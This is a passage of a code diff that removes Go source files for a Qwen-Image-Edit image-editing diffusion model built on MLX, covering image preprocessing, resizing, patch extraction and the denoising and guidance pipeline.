// Tile along T dimension: [B, T, H, W, C] -> [B, kT, H, W, C]
x = mlx.Tile(x, []int32{1, kT, 1, 1, 1})
T = kT
}
outT := (T - kT) / strideT + 1
outH := (H - kH) / strideH + 1
outW := (W - kW) / strideW + 1
// Extract 3D patches in [C, T, H, W] order to match Python
patches := extractPatches3DStrided(x, kT, kH, kW, strideT, strideH, strideW)
// patches shape: [B, outT, outH, outW, C*kT*kH*kW]
// Weight is [O, I, kT, kH, kW] - flatten to [O, I*kT*kH*kW] to match patch order [C, T, H, W]
wFlat := mlx.Reshape(weight, Cout, -1) // [Cout, I*kT*kH*kW]
patches = mlx.Reshape(patches, B*outT*outH*outW, C*kT*kH*kW)
out := mlx.Linear(patches, mlx.Transpose(wFlat, 1, 0))
return mlx.Reshape(out, B, outT, outH, outW, Cout)
}
// extractPatches3DStrided extracts 3D patches with given strides
// Returns patches with values in [C, T, H, W] order to match Python's preprocessing
func extractPatches3DStrided(x *mlx.Array, kT, kH, kW, strideT, strideH, strideW int32) *mlx.Array {
shape := x.Shape()
B := shape[0]
T := shape[1]
H := shape[2]
W := shape[3]
C := shape[4]
outT := (T - kT) / strideT + 1
outH := (H - kH) / strideH + 1
outW := (W - kW) / strideW + 1
numPatches := outT * outH * outW
patches := make([]*mlx.Array, numPatches)
idx := 0
for t := int32(0); t < outT; t++ {
for i := int32(0); i < outH; i++ {
for j := int32(0); j < outW; j++ {
startT := t * strideT
startH := i * strideH
startW := j * strideW
// Extract patch: [B, kT, kH, kW, C]
patch := mlx.Slice(x,
[]int32{0, startT, startH, startW, 0},
[]int32{B, startT + kT, startH + kH, startW + kW, C})
// Transpose from [B, T, H, W, C] to [B, C, T, H, W] to match Python's order
patch = mlx.Transpose(patch, 0, 4, 1, 2, 3)
// Flatten to [B, C*T*H*W]
patch = mlx.Reshape(patch, B, C*kT*kH*kW)
patches[idx] = patch
idx++
}
}
}
for i := range patches {
patches[i] = mlx.ExpandDims(patches[i], 1)
}
stacked := mlx.Concatenate(patches, 1)
return mlx.Reshape(stacked, B, outT, outH, outW, C*kT*kH*kW)
}
// extractPatches2DStrided extracts patches with given stride
func extractPatches2DStrided(x *mlx.Array, kH, kW, stride int32) *mlx.Array {
shape := x.Shape()
B := shape[0]
H := shape[1]
W := shape[2]
C := shape[3]
outH := (H - kH) / stride + 1
outW := (W - kW) / stride + 1
patches := make([]*mlx.Array, outH*outW)
idx := 0
for i := int32(0); i < outH; i++ {
for j := int32(0); j < outW; j++ {
startH := i * stride
startW := j * stride
patch := mlx.Slice(x, []int32{0, startH, startW, 0}, []int32{B, startH + kH, startW + kW, C})
patch = mlx.Reshape(patch, B, kH*kW*C)
patches[idx] = patch
idx++
}
}
for i := range patches {
patches[i] = mlx.ExpandDims(patches[i], 1)
}
stacked := mlx.Concatenate(patches, 1)
return mlx.Reshape(stacked, B, outH, outW, kH*kW*C)
}
// layerNormNoAffine applies layer norm without learnable parameters
func layerNormNoAffine(x *mlx.Array, eps float32) *mlx.Array {
ndim := x.Ndim()
lastAxis := ndim - 1
mean := mlx.Mean(x, lastAxis, true)
xCentered := mlx.Sub(x, mean)
variance := mlx.Mean(mlx.Square(xCentered), lastAxis, true)
return mlx.Div(xCentered, mlx.Sqrt(mlx.AddScalar(variance, eps)))
}

View File

@@ -1,475 +0,0 @@
//go:build mlx
package qwen_image_edit
import (
"fmt"
"image"
"image/color"
_ "image/jpeg"
_ "image/png"
"math"
"os"
"github.com/ollama/ollama/x/imagegen/mlx"
"golang.org/x/image/draw"
_ "golang.org/x/image/webp"
)
// loadImageFile loads an image from disk
func loadImageFile(path string) (image.Image, error) {
f, err := os.Open(path)
if err != nil {
return nil, fmt.Errorf("open image: %w", err)
}
defer f.Close()
img, _, err := image.Decode(f)
if err != nil {
return nil, fmt.Errorf("decode image: %w", err)
}
return img, nil
}
// imageToFloat32Pixels converts an image to a float32 pixel array [H, W, C] in [0, 1] range
func imageToFloat32Pixels(img image.Image, width, height int) []float32 {
pixels := make([]float32, width*height*3)
idx := 0
for y := 0; y < height; y++ {
for x := 0; x < width; x++ {
r, g, b, _ := img.At(x, y).RGBA()
pixels[idx] = float32(r) / 65535.0
pixels[idx+1] = float32(g) / 65535.0
pixels[idx+2] = float32(b) / 65535.0
idx += 3
}
}
return pixels
}
// normalizeImageNet applies ImageNet normalization to an image tensor
func (p *Processor) normalizeImageNet(arr *mlx.Array) *mlx.Array {
mean := mlx.NewArray(p.Config.ImageMean, []int32{1, 1, 3})
std := mlx.NewArray(p.Config.ImageStd, []int32{1, 1, 3})
return mlx.Div(mlx.Sub(arr, mean), std)
}
// prepareImageTensor transforms [H, W, C] to [B, C, H, W] and converts to bf16
func prepareImageTensor(arr *mlx.Array) *mlx.Array {
// Transpose to [C, H, W] and make contiguous
arr = mlx.Contiguous(mlx.Transpose(arr, 2, 0, 1))
// Add batch dimension [1, C, H, W]
arr = mlx.ExpandDims(arr, 0)
// Convert to bf16
arr = mlx.ToBFloat16(arr)
mlx.Eval(arr)
return arr
}
// clampFloat clamps a value to [0, 255] and returns uint8
func clampFloat(v, weightSum float64) uint8 {
v /= weightSum
if v < 0 {
v = 0
}
if v > 255 {
v = 255
}
return uint8(math.Round(v))
}
// ImageDims holds dimensions for a preprocessed image
type ImageDims struct {
// Original image dimensions
OrigW, OrigH int32
// Condition image dimensions (for vision encoder)
CondW, CondH int32
// VAE image dimensions
VaeW, VaeH int32
// Latent dimensions (VAE dims / vae_scale_factor)
LatentW, LatentH int32
// Patch dimensions (latent dims / patch_size)
PatchW, PatchH int32
}
// ProcessorConfig holds image processor configuration
type ProcessorConfig struct {
// Condition image size (target pixel area for vision encoder input)
// Python: CONDITION_IMAGE_SIZE = 384 * 384 = 147456
// Pipeline resizes image to this area before passing to encode_prompt
ConditionImageSize int32
// VAE image size (target pixel area)
// Python: VAE_IMAGE_SIZE = 1024 * 1024 = 1048576
VAEImageSize int32
// Image normalization (ImageNet stats for vision encoder)
ImageMean []float32
ImageStd []float32
}
// defaultProcessorConfig returns default processor config
func defaultProcessorConfig() *ProcessorConfig {
return &ProcessorConfig{
ConditionImageSize: 384 * 384, // 147456 - matches Python CONDITION_IMAGE_SIZE
VAEImageSize: 1024 * 1024, // 1048576 - matches Python VAE_IMAGE_SIZE
ImageMean: []float32{0.48145466, 0.4578275, 0.40821073},
ImageStd: []float32{0.26862954, 0.26130258, 0.27577711},
}
}
// Processor handles image preprocessing for Qwen-Image-Edit
type Processor struct {
Config *ProcessorConfig
}
// Load loads the processor config
func (p *Processor) Load(path string) error {
p.Config = defaultProcessorConfig()
return nil
}
// LoadAndPreprocess loads an image and preprocesses it for both paths
// Returns: condImage (for vision encoder), vaeImage (for VAE encoding)
func (p *Processor) LoadAndPreprocess(imagePath string) (*mlx.Array, *mlx.Array, error) {
img, err := loadImageFile(imagePath)
if err != nil {
return nil, nil, err
}
bounds := img.Bounds()
origW := bounds.Dx()
origH := bounds.Dy()
ratio := float64(origW) / float64(origH)
// Calculate dimensions for condition image (vision encoder)
// Python pipeline does TWO resizes:
// 1. VaeImageProcessor.resize with Lanczos to CONDITION_IMAGE_SIZE (384x384 area)
// 2. Qwen2VLProcessor's smart_resize with Bicubic to multiple of 28
intermediateW, intermediateH := calculateDimensions(p.Config.ConditionImageSize, ratio, 32)
finalH, finalW := smartResize(intermediateH, intermediateW, 28, 56*56, 28*28*1280)
// Calculate dimensions for VAE image (1024x1024 area)
// Use multiple of 32 (vae_scale_factor * patch_size * 2 = 8 * 2 * 2 = 32)
vaeW, vaeH := calculateDimensions(p.Config.VAEImageSize, ratio, 32)
// Preprocess for condition (vision encoder) - two-step resize
condImage := p.preprocessImageTwoStep(img, intermediateW, intermediateH, finalW, finalH)
// Preprocess for VAE ([-1, 1] range, 5D tensor)
vaeImage := p.preprocessImageForVAE(img, vaeW, vaeH)
return condImage, vaeImage, nil
}
// preprocessImageLanczos does single-step Lanczos resize for vision encoder
// Matches Python VaeImageProcessor.resize with resample='lanczos' (the default)
// Used by edit_plus pipeline for multi-image input
// Returns: [B, C, H, W] normalized tensor
func (p *Processor) preprocessImageLanczos(img image.Image, width, height int32) *mlx.Array {
resized := resizeImageLanczos(img, int(width), int(height))
pixels := imageToFloat32Pixels(resized, int(width), int(height))
arr := mlx.NewArray(pixels, []int32{height, width, 3})
arr = p.normalizeImageNet(arr)
return prepareImageTensor(arr)
}
// preprocessImageTwoStep does two-step resize for vision encoder to match Python pipeline
// Step 1: Lanczos resize from original to intermediate size (VaeImageProcessor.resize)
// Step 2: Bicubic resize from intermediate to final size (Qwen2VLProcessor smart_resize)
// Returns: [B, C, H, W] normalized tensor
func (p *Processor) preprocessImageTwoStep(img image.Image, intermediateW, intermediateH, finalW, finalH int32) *mlx.Array {
intermediate := resizeImageLanczos(img, int(intermediateW), int(intermediateH))
resized := resizeImageBicubic(intermediate, int(finalW), int(finalH))
pixels := imageToFloat32Pixels(resized, int(finalW), int(finalH))
arr := mlx.NewArray(pixels, []int32{finalH, finalW, 3})
arr = p.normalizeImageNet(arr)
return prepareImageTensor(arr)
}
// preprocessImage converts image to tensor for vision encoder
// Returns: [B, C, H, W] normalized tensor
func (p *Processor) preprocessImage(img image.Image, width, height int32, normalize bool) *mlx.Array {
resized := resizeImageBicubic(img, int(width), int(height))
pixels := imageToFloat32Pixels(resized, int(width), int(height))
arr := mlx.NewArray(pixels, []int32{height, width, 3})
if normalize {
arr = p.normalizeImageNet(arr)
}
return prepareImageTensor(arr)
}
// preprocessImageForVAE converts image to tensor for VAE encoding
// Returns: [B, C, T, H, W] tensor in [-1, 1] range
func (p *Processor) preprocessImageForVAE(img image.Image, width, height int32) *mlx.Array {
resized := resizeImageLanczos(img, int(width), int(height))
pixels := imageToFloat32Pixels(resized, int(width), int(height))
arr := mlx.NewArray(pixels, []int32{height, width, 3})
// Scale to [-1, 1]: arr * 2 - 1
arr = mlx.MulScalar(arr, 2.0)
arr = mlx.AddScalar(arr, -1.0)
// Transpose to [C, H, W] and make contiguous
arr = mlx.Contiguous(mlx.Transpose(arr, 2, 0, 1))
// Add batch and temporal dimensions [1, C, 1, H, W]
arr = mlx.ExpandDims(arr, 0) // [1, C, H, W]
arr = mlx.ExpandDims(arr, 2) // [1, C, 1, H, W]
arr = mlx.ToBFloat16(arr)
mlx.Eval(arr)
return arr
}
// smartResize implements Python Qwen2VL processor's smart_resize logic
// Returns (resizedHeight, resizedWidth) that fit within min/max pixel constraints
func smartResize(height, width, factor, minPixels, maxPixels int32) (int32, int32) {
// Round to factor
hBar := int32(math.Round(float64(height)/float64(factor))) * factor
wBar := int32(math.Round(float64(width)/float64(factor))) * factor
// Ensure minimum factor size
if hBar < factor {
hBar = factor
}
if wBar < factor {
wBar = factor
}
// Check pixel constraints
total := hBar * wBar
if total > maxPixels {
// Scale down
beta := math.Sqrt(float64(maxPixels) / float64(total))
hBar = int32(math.Floor(float64(height)*beta/float64(factor))) * factor
wBar = int32(math.Floor(float64(width)*beta/float64(factor))) * factor
} else if total < minPixels {
// Scale up
beta := math.Sqrt(float64(minPixels) / float64(total))
hBar = int32(math.Ceil(float64(height)*beta/float64(factor))) * factor
wBar = int32(math.Ceil(float64(width)*beta/float64(factor))) * factor
}
return hBar, wBar
}
// calculateDimensions calculates width and height for a target area while maintaining ratio
// multiple: the value to round dimensions to (e.g., 28 for vision encoder with patch 14 and 2x2 merge)
func calculateDimensions(targetArea int32, ratio float64, multiple int32) (int32, int32) {
width := math.Sqrt(float64(targetArea) * ratio)
height := width / ratio
m := float64(multiple)
width = math.Round(width/m) * m
height = math.Round(height/m) * m
// Ensure minimum dimensions
if width < m {
width = m
}
if height < m {
height = m
}
return int32(width), int32(height)
}
// resizeImageLanczos resizes an image using Lanczos3 interpolation (matches PIL.LANCZOS)
func resizeImageLanczos(img image.Image, width, height int) image.Image {
bounds := img.Bounds()
dst := image.NewRGBA(image.Rect(0, 0, width, height))
// Lanczos3 kernel (a=3) to match PIL.LANCZOS
lanczos3 := &draw.Kernel{
Support: 3.0,
At: func(t float64) float64 {
if t == 0 {
return 1.0
}
if t < 0 {
t = -t
}
if t >= 3.0 {
return 0.0
}
// sinc(t) * sinc(t/3)
piT := math.Pi * t
return (math.Sin(piT) / piT) * (math.Sin(piT/3) / (piT / 3))
},
}
lanczos3.Scale(dst, dst.Bounds(), img, bounds, draw.Over, nil)
return dst
}
// resizeImageBicubic resizes an image using bicubic interpolation (matches PIL.BICUBIC)
// Uses separable interpolation with PIL's coordinate mapping for exact match
func resizeImageBicubic(img image.Image, width, height int) image.Image {
bounds := img.Bounds()
srcW := bounds.Dx()
srcH := bounds.Dy()
// Convert to RGBA if needed
var src *image.RGBA
if rgba, ok := img.(*image.RGBA); ok {
src = rgba
} else {
src = image.NewRGBA(bounds)
for y := bounds.Min.Y; y < bounds.Max.Y; y++ {
for x := bounds.Min.X; x < bounds.Max.X; x++ {
src.Set(x, y, img.At(x, y))
}
}
}
// Keys cubic with a=-0.5 (PIL BICUBIC)
cubic := func(x float64) float64 {
if x < 0 {
x = -x
}
if x < 1 {
return 1.5*x*x*x - 2.5*x*x + 1
}
if x < 2 {
return -0.5*x*x*x + 2.5*x*x - 4*x + 2
}
return 0
}
// Horizontal pass: srcW -> width, keep srcH rows
temp := image.NewRGBA(image.Rect(0, 0, width, srcH))
for y := 0; y < srcH; y++ {
for dstX := 0; dstX < width; dstX++ {
// PIL coordinate mapping: center-to-center
srcXf := (float64(dstX)+0.5)*(float64(srcW)/float64(width)) - 0.5
baseX := int(math.Floor(srcXf))
var sumR, sumG, sumB, sumA, weightSum float64
for i := -1; i <= 2; i++ {
sx := baseX + i
if sx < 0 {
sx = 0
}
if sx >= srcW {
sx = srcW - 1
}
w := cubic(math.Abs(srcXf - float64(baseX+i)))
c := src.RGBAAt(sx, y)
sumR += float64(c.R) * w
sumG += float64(c.G) * w
sumB += float64(c.B) * w
sumA += float64(c.A) * w
weightSum += w
}
temp.SetRGBA(dstX, y, color.RGBA{
clampFloat(sumR, weightSum),
clampFloat(sumG, weightSum),
clampFloat(sumB, weightSum),
clampFloat(sumA, weightSum),
})
}
}
// Vertical pass: srcH -> height
dst := image.NewRGBA(image.Rect(0, 0, width, height))
for x := 0; x < width; x++ {
for dstY := 0; dstY < height; dstY++ {
srcYf := (float64(dstY)+0.5)*(float64(srcH)/float64(height)) - 0.5
baseY := int(math.Floor(srcYf))
var sumR, sumG, sumB, sumA, weightSum float64
for j := -1; j <= 2; j++ {
sy := baseY + j
if sy < 0 {
sy = 0
}
if sy >= srcH {
sy = srcH - 1
}
w := cubic(math.Abs(srcYf - float64(baseY+j)))
c := temp.RGBAAt(x, sy)
sumR += float64(c.R) * w
sumG += float64(c.G) * w
sumB += float64(c.B) * w
sumA += float64(c.A) * w
weightSum += w
}
dst.SetRGBA(x, dstY, color.RGBA{
clampFloat(sumR, weightSum),
clampFloat(sumG, weightSum),
clampFloat(sumB, weightSum),
clampFloat(sumA, weightSum),
})
}
}
return dst
}
// LoadAndPreprocessMultiple loads multiple images and preprocesses them
// Returns: condImages (for vision encoder), vaeImages (for VAE encoding), dims (per-image dimensions)
func (p *Processor) LoadAndPreprocessMultiple(imagePaths []string) ([]*mlx.Array, []*mlx.Array, []ImageDims, error) {
const vaeScaleFactor int32 = 8
const patchSize int32 = 2
condImages := make([]*mlx.Array, len(imagePaths))
vaeImages := make([]*mlx.Array, len(imagePaths))
dims := make([]ImageDims, len(imagePaths))
for i, imagePath := range imagePaths {
img, err := loadImageFile(imagePath)
if err != nil {
return nil, nil, nil, fmt.Errorf("image %d: %w", i, err)
}
bounds := img.Bounds()
origW := int32(bounds.Dx())
origH := int32(bounds.Dy())
ratio := float64(origW) / float64(origH)
// Calculate dimensions for condition image (vision encoder)
// Python pipeline does TWO resizes:
// 1. VaeImageProcessor.resize with Lanczos to CONDITION_IMAGE_SIZE (384x384 area)
// 2. Qwen2VLProcessor's smart_resize with Bicubic to multiple of 28
intermediateW, intermediateH := calculateDimensions(p.Config.ConditionImageSize, ratio, 32)
condH, condW := smartResize(intermediateH, intermediateW, 28, 56*56, 28*28*1280)
// Calculate dimensions for VAE image (1024x1024 area)
vaeW, vaeH := calculateDimensions(p.Config.VAEImageSize, ratio, 32)
// Calculate derived dimensions
latentW := vaeW / vaeScaleFactor
latentH := vaeH / vaeScaleFactor
patchW := latentW / patchSize
patchH := latentH / patchSize
dims[i] = ImageDims{
OrigW: origW,
OrigH: origH,
CondW: condW,
CondH: condH,
VaeW: vaeW,
VaeH: vaeH,
LatentW: latentW,
LatentH: latentH,
PatchW: patchW,
PatchH: patchH,
}
fmt.Printf(" Image %d: orig=%dx%d, cond=%dx%d, vae=%dx%d, latent=%dx%d, patch=%dx%d\n",
i+1, origW, origH, condW, condH, vaeW, vaeH, latentW, latentH, patchW, patchH)
// Preprocess for condition (vision encoder) - two-step resize to match Python pipeline
condImages[i] = p.preprocessImageTwoStep(img, intermediateW, intermediateH, condW, condH)
// Preprocess for VAE ([-1, 1] range, 5D tensor)
vaeImages[i] = p.preprocessImageForVAE(img, vaeW, vaeH)
}
return condImages, vaeImages, dims, nil
}

View File

@@ -1,610 +0,0 @@
//go:build mlx
// Package qwen_image_edit implements the Qwen-Image-Edit diffusion model for image editing.
// It reuses components from qwen_image where possible.
package qwen_image_edit
import (
"context"
"fmt"
"path/filepath"
"time"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/models/qwen_image"
"github.com/ollama/ollama/x/imagegen/tokenizer"
)
// GenerateConfig holds all options for image editing.
type GenerateConfig struct {
Prompt string
NegativePrompt string // Unconditional prompt for CFG (empty string "" is valid)
CFGScale float32 // CFG enabled when > 1.0 (default: 4.0)
Width int32 // Output width (default: from input image)
Height int32 // Output height (default: from input image)
Steps int // Denoising steps (default: 50)
Seed int64 // Random seed
Progress ProgressFunc // Optional progress callback
}
// ProgressFunc is called during generation with step progress.
type ProgressFunc func(step, totalSteps int)
// Model represents a Qwen-Image-Edit diffusion model.
type Model struct {
ModelPath string
Tokenizer *tokenizer.Tokenizer
Processor *Processor // Image processor for vision encoder
TextEncoder *qwen_image.Qwen25VL // Qwen2.5-VL vision-language encoder (from qwen_image)
Transformer *qwen_image.Transformer // Reuse qwen_image transformer
VAE *VAE // Combined encoder + decoder
}
// Load loads the Qwen-Image-Edit model from a directory.
func (m *Model) Load(modelPath string) error {
fmt.Println("Loading Qwen-Image-Edit model...")
start := time.Now()
if mlx.GPUIsAvailable() {
mlx.SetDefaultDeviceGPU()
mlx.EnableCompile()
}
m.ModelPath = modelPath
// Load tokenizer from processor directory
fmt.Print(" Loading tokenizer... ")
processorPath := filepath.Join(modelPath, "processor")
tok, err := tokenizer.Load(processorPath)
if err != nil {
// Fallback to tokenizer directory
tokenizerPath := filepath.Join(modelPath, "tokenizer")
tok, err = tokenizer.Load(tokenizerPath)
if err != nil {
return fmt.Errorf("tokenizer: %w", err)
}
}
m.Tokenizer = tok
fmt.Println("✓")
// Load processor (image preprocessing config)
fmt.Print(" Loading processor... ")
m.Processor = &Processor{}
if err := m.Processor.Load(processorPath); err != nil {
return fmt.Errorf("processor: %w", err)
}
fmt.Println("✓")
// Load vision-language text encoder (Qwen2.5-VL from qwen_image package)
m.TextEncoder = &qwen_image.Qwen25VL{}
if err := m.TextEncoder.Load(filepath.Join(modelPath, "text_encoder")); err != nil {
return fmt.Errorf("text encoder: %w", err)
}
mlx.Eval(mlx.Collect(m.TextEncoder)...)
fmt.Printf(" (%.1f GB, peak %.1f GB)\n",
float64(mlx.MetalGetActiveMemory())/(1024*1024*1024),
float64(mlx.MetalGetPeakMemory())/(1024*1024*1024))
// Load transformer (reuse qwen_image)
m.Transformer = &qwen_image.Transformer{}
if err := m.Transformer.Load(filepath.Join(modelPath, "transformer")); err != nil {
return fmt.Errorf("transformer: %w", err)
}
mlx.Eval(mlx.Collect(m.Transformer)...)
fmt.Printf(" (%.1f GB, peak %.1f GB)\n",
float64(mlx.MetalGetActiveMemory())/(1024*1024*1024),
float64(mlx.MetalGetPeakMemory())/(1024*1024*1024))
// Load VAE (encoder + decoder)
m.VAE = &VAE{}
if err := m.VAE.Load(filepath.Join(modelPath, "vae")); err != nil {
return fmt.Errorf("VAE: %w", err)
}
mlx.Eval(mlx.Collect(m.VAE)...)
fmt.Printf(" (%.1f GB, peak %.1f GB)\n",
float64(mlx.MetalGetActiveMemory())/(1024*1024*1024),
float64(mlx.MetalGetPeakMemory())/(1024*1024*1024))
mem := mlx.MetalGetActiveMemory()
peak := mlx.MetalGetPeakMemory()
fmt.Printf(" Loaded in %.2fs (%.1f GB active, %.1f GB peak)\n",
time.Since(start).Seconds(),
float64(mem)/(1024*1024*1024),
float64(peak)/(1024*1024*1024))
return nil
}
// Edit edits an image based on a text prompt.
// inputImagePath: path to input image
// prompt: text description of desired edit
func (m *Model) Edit(inputImagePath string, prompt string, width, height int32, steps int, seed int64) (*mlx.Array, error) {
return m.EditFromConfig([]string{inputImagePath}, &GenerateConfig{
Prompt: prompt,
Width: width,
Height: height,
Steps: steps,
Seed: seed,
})
}
// EditFromConfig edits images using the unified config struct.
// Accepts one or more input images.
func (m *Model) EditFromConfig(inputImagePaths []string, cfg *GenerateConfig) (*mlx.Array, error) {
if len(inputImagePaths) == 0 {
return nil, fmt.Errorf("no input images provided")
}
start := time.Now()
result, err := m.edit(inputImagePaths, cfg)
if err != nil {
return nil, err
}
if cfg.NegativePrompt != "" {
fmt.Printf("Edited %d image(s) with CFG (scale=%.1f) in %.2fs (%d steps)\n",
len(inputImagePaths), cfg.CFGScale, time.Since(start).Seconds(), cfg.Steps)
} else {
fmt.Printf("Edited %d image(s) in %.2fs (%d steps)\n",
len(inputImagePaths), time.Since(start).Seconds(), cfg.Steps)
}
return result, nil
}
// EditImage implements model.ImageEditModel interface.
func (m *Model) EditImage(ctx context.Context, inputImagePath, prompt string, width, height int32, steps int, seed int64) (*mlx.Array, error) {
return m.Edit(inputImagePath, prompt, width, height, steps, seed)
}
// EditMultiImage edits using multiple source images.
// This matches diffusers' QwenImageEditPlusPipeline behavior.
func (m *Model) EditMultiImage(inputImagePaths []string, cfg *GenerateConfig) (*mlx.Array, error) {
return m.EditFromConfig(inputImagePaths, cfg)
}
// edit is the internal editing pipeline that handles one or more images.
func (m *Model) edit(inputImagePaths []string, cfg *GenerateConfig) (*mlx.Array, error) {
// Apply defaults
if cfg.Steps <= 0 {
cfg.Steps = 50
}
if cfg.CFGScale <= 0 {
cfg.CFGScale = 4.0
}
// Load and preprocess all input images
fmt.Printf("Loading %d image(s)...\n", len(inputImagePaths))
condImages, vaeImages, inputDims, err := m.Processor.LoadAndPreprocessMultiple(inputImagePaths)
if err != nil {
return nil, fmt.Errorf("preprocess images: %w", err)
}
for _, img := range condImages {
mlx.Keep(img)
}
for _, img := range vaeImages {
mlx.Keep(img)
}
mlx.Eval(append(condImages, vaeImages...)...)
useCFG := cfg.NegativePrompt != ""
tcfg := m.Transformer.Config
vaeScaleFactor := int32(8)
// Output dimensions - if not specified, use first input image dimensions
if cfg.Width <= 0 {
cfg.Width = inputDims[0].VaeW
}
if cfg.Height <= 0 {
cfg.Height = inputDims[0].VaeH
}
// Output (noise) latent dimensions
outLatentH := cfg.Height / vaeScaleFactor
outLatentW := cfg.Width / vaeScaleFactor
outPH := outLatentH / tcfg.PatchSize
outPW := outLatentW / tcfg.PatchSize
noiseSeqLen := outPH * outPW
imgSeqLen := noiseSeqLen
// Encode prompt with all images for conditioning
posEmb, _, _, err := m.TextEncoder.EncodePromptWithImages(m.Tokenizer, cfg.Prompt, condImages)
if err != nil {
return nil, fmt.Errorf("encoding prompt: %w", err)
}
mlx.Keep(posEmb)
mlx.Eval(posEmb)
var negEmb *mlx.Array
if useCFG {
negEmb, _, _, err = m.TextEncoder.EncodePromptWithImages(m.Tokenizer, cfg.NegativePrompt, condImages)
if err != nil {
return nil, fmt.Errorf("encoding negative prompt: %w", err)
}
mlx.Keep(negEmb)
mlx.Eval(negEmb)
}
// Pad sequences to same length for CFG
txtLen := posEmb.Shape()[1]
if useCFG {
negLen := negEmb.Shape()[1]
if negLen > txtLen {
txtLen = negLen
}
if posEmb.Shape()[1] < txtLen {
posEmb = padSequence(posEmb, txtLen)
}
if negEmb.Shape()[1] < txtLen {
negEmb = padSequence(negEmb, txtLen)
}
mlx.Keep(posEmb, negEmb)
mlx.Eval(posEmb, negEmb)
}
// Encode all input images to latents and concatenate
fmt.Println("Encoding images to latents...")
allImageLatentsPacked := make([]*mlx.Array, len(vaeImages))
for i, vaeImage := range vaeImages {
imageLatents := m.VAE.Encode(vaeImage)
imageLatents = m.VAE.Normalize(imageLatents)
imageLatents2D := mlx.Squeeze(imageLatents, 2)
packed := qwen_image.PackLatents(imageLatents2D, tcfg.PatchSize)
mlx.Keep(packed)
mlx.Eval(packed)
allImageLatentsPacked[i] = packed
}
imageLatentsPacked := mlx.Concatenate(allImageLatentsPacked, 1)
mlx.Keep(imageLatentsPacked)
mlx.Eval(imageLatentsPacked)
// Scheduler
scheduler := qwen_image.NewFlowMatchScheduler(qwen_image.DefaultSchedulerConfig())
scheduler.SetTimesteps(cfg.Steps, noiseSeqLen)
// Init noise latents in packed format
packedChannels := tcfg.OutChannels * tcfg.PatchSize * tcfg.PatchSize
packedNoise := scheduler.InitNoisePacked(1, noiseSeqLen, packedChannels, cfg.Seed)
latents := qwen_image.UnpackLatents(packedNoise, outLatentH, outLatentW, tcfg.PatchSize)
mlx.Eval(latents)
// RoPE cache
ropeCache := PrepareRoPEMultiImage(outPH, outPW, inputDims, txtLen, tcfg.AxesDimsRope)
mlx.Keep(ropeCache.ImgFreqs, ropeCache.TxtFreqs)
mlx.Eval(ropeCache.ImgFreqs, ropeCache.TxtFreqs)
// Denoising loop
fmt.Printf("Running denoising (%d steps)...\n", cfg.Steps)
for i := 0; i < cfg.Steps; i++ {
stepStart := time.Now()
if cfg.Progress != nil {
cfg.Progress(i+1, cfg.Steps)
}
t := scheduler.Timesteps[i]
timestep := mlx.ToBFloat16(mlx.NewArray([]float32{t}, []int32{1}))
mlx.Eval(timestep)
latents2D := mlx.Squeeze(latents, 2)
patches := qwen_image.PackLatents(latents2D, tcfg.PatchSize)
latentInput := mlx.Concatenate([]*mlx.Array{patches, imageLatentsPacked}, 1)
var output *mlx.Array
if useCFG {
posOutput := m.Transformer.Forward(latentInput, posEmb, timestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs)
negOutput := m.Transformer.Forward(latentInput, negEmb, timestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs)
posOutput = mlx.Slice(posOutput, []int32{0, 0, 0}, []int32{1, imgSeqLen, posOutput.Shape()[2]})
negOutput = mlx.Slice(negOutput, []int32{0, 0, 0}, []int32{1, imgSeqLen, negOutput.Shape()[2]})
output = applyCFGWithNormRescale(posOutput, negOutput, cfg.CFGScale)
} else {
output = m.Transformer.Forward(latentInput, posEmb, timestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs)
output = mlx.Slice(output, []int32{0, 0, 0}, []int32{1, imgSeqLen, output.Shape()[2]})
}
noisePred := qwen_image.UnpackLatents(output, outLatentH, outLatentW, tcfg.PatchSize)
oldLatents := latents
latents = scheduler.Step(noisePred, latents, i)
mlx.Eval(latents)
oldLatents.Free()
fmt.Printf(" Step %d/%d: t=%.4f (%.2fs)\n", i+1, cfg.Steps, t, time.Since(stepStart).Seconds())
}
// Free denoising temporaries
posEmb.Free()
if negEmb != nil {
negEmb.Free()
}
ropeCache.ImgFreqs.Free()
ropeCache.TxtFreqs.Free()
imageLatentsPacked.Free()
// Decode latents
decoded := m.decodeAndPostprocess(latents)
latents.Free()
fmt.Printf(" Peak memory: %.2f GB\n", float64(mlx.MetalGetPeakMemory())/(1024*1024*1024))
return decoded, nil
}
// applyCFGWithNormRescale applies classifier-free guidance with norm rescaling.
// This prevents CFG from inflating magnitude too much.
func applyCFGWithNormRescale(posOutput, negOutput *mlx.Array, scale float32) *mlx.Array {
// Upcast to float32 for precision
posF32 := mlx.AsType(posOutput, mlx.DtypeFloat32)
negF32 := mlx.AsType(negOutput, mlx.DtypeFloat32)
// CFG: pred = neg + scale * (pos - neg)
diff := mlx.Sub(posF32, negF32)
scaledDiff := mlx.MulScalar(diff, scale)
combPred := mlx.Add(negF32, scaledDiff)
// Norm rescaling: rescale combined prediction to match conditional norm
condNorm := mlx.Sqrt(mlx.Sum(mlx.Square(posF32), -1, true))
combNorm := mlx.Sqrt(mlx.Sum(mlx.Square(combPred), -1, true))
output := mlx.Mul(combPred, mlx.Div(condNorm, combNorm))
mlx.Eval(output)
return mlx.ToBFloat16(output)
}
// decodeAndPostprocess denormalizes latents, decodes through VAE, and scales to [0,1].
func (m *Model) decodeAndPostprocess(latents *mlx.Array) *mlx.Array {
latents = m.VAE.Denormalize(latents)
decoded := m.VAE.Decode(latents)
// Post-process: squeeze temporal dim and rescale to [0, 1]
decoded = mlx.Squeeze(decoded, 2)
decoded = mlx.AddScalar(decoded, 1.0)
decoded = mlx.DivScalar(decoded, 2.0)
decoded = mlx.ClipScalar(decoded, 0.0, 1.0, true, true)
mlx.Eval(decoded)
return decoded
}
// padSequence pads a sequence tensor to the target length with zeros
func padSequence(x *mlx.Array, targetLen int32) *mlx.Array {
shape := x.Shape()
currentLen := shape[1]
if currentLen >= targetLen {
return x
}
padLen := targetLen - currentLen
// Pad on sequence dimension (axis 1)
return mlx.Pad(x, []int32{0, 0, 0, padLen, 0, 0})
}
// LoadPersistent is an alias for backward compatibility.
func LoadPersistent(modelPath string) (*Model, error) {
m := &Model{}
if err := m.Load(modelPath); err != nil {
return nil, err
}
return m, nil
}
